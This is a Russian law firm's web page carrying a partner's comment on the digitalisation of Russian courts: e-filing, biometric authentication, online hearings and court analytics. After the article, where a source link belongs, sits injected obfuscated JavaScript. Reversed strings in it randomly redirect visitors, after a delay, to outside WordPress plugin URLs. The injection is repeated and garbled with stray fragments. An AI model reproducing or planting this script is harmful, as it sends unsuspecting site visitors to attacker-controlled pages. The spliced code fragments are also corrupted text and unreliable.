Больше не экзотика: российское правосудие уходит в цифровую реальность

Комментарий Алексея Станкевича, партнёра Orchards, для газеты «Деловой Петербург».

Российские суды с каждым годом всё больше внедряют цифровые алгоритмы, а количество электронных обращений неуклонно растёт. Юристы с энтузиазмом принимают новую цифровую реальность, хотя и признают, что живое общение в процессах вряд ли сможет что–то заменить.

К 2024 году «Электронное правосудие» должно перейти к следующему этапу развития — обеспечению полного доступа лиц, участвующих в процессе, к материалам дел арбитражных судов. Функционал планировалось реализовать через интеграцию с суперсервисом «Правосудие онлайн». Одновременно с этим должна заработать биометрическая аутентификация участников судебного процесса, которая даёт право допрашивать онлайн свидетелей и экспертов.

Партнёр компании Orchards Алексей Станкевич указывает, что активные работы идут над возможностью обращения в суды через «Госуслуги». По его словам, это должно облегчить реализацию права на защиту граждан, которым сложно разобраться с большим количеством систем и условиями их работы.

Сервис ГАС «Правосудие» (работает с судами общей юрисдикции), по его мнению, кардинальных изменений не требует. Среди желаемых новшеств эксперт называет возможность автозаполнения реквизитов юридических лиц и органов власти при заполнении форм, как это реализовано в системе «Мой арбитр».

При переходе в онлайн юристов больше всего беспокоят вопросы безопасности. Алексей Станкевич вспоминает постановление Невьянского горсуда Свердловской области, где говорилось о проведении судебного заседания «путём видеозвонка с использованием мессенджера WhatsApp». По мнению юриста, необходим баланс, когда проведение удобных и практичных онлайн–заседаний будет возможно, а неурегулированности в использовании программ для проведения таких заседаний не будет.

Работа судов в будущем всё больше будет строиться на цифровых алгоритмах, но вряд ли можно представить исключение человеческого фактора, уверен Алексей Станкевич. В связи с ежегодным ростом электронных обращений в суды он прогнозирует появление в России компаний, занимающихся анализом большого объёма данных о деятельности судов и судей на примере американского рынка. Речь идёт, например, о Lex Machina, Bloomberg Law Litigation Analytics и Judicata, которые сейчас предоставляют юридическую аналитику.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top&utm_referrer=https:%2F%2Fyandex.ru%2Fnews%2Fsearch%3Ftext%3D»>Ссылка на статью>>

Подпишитесь на Telegram Orchards

X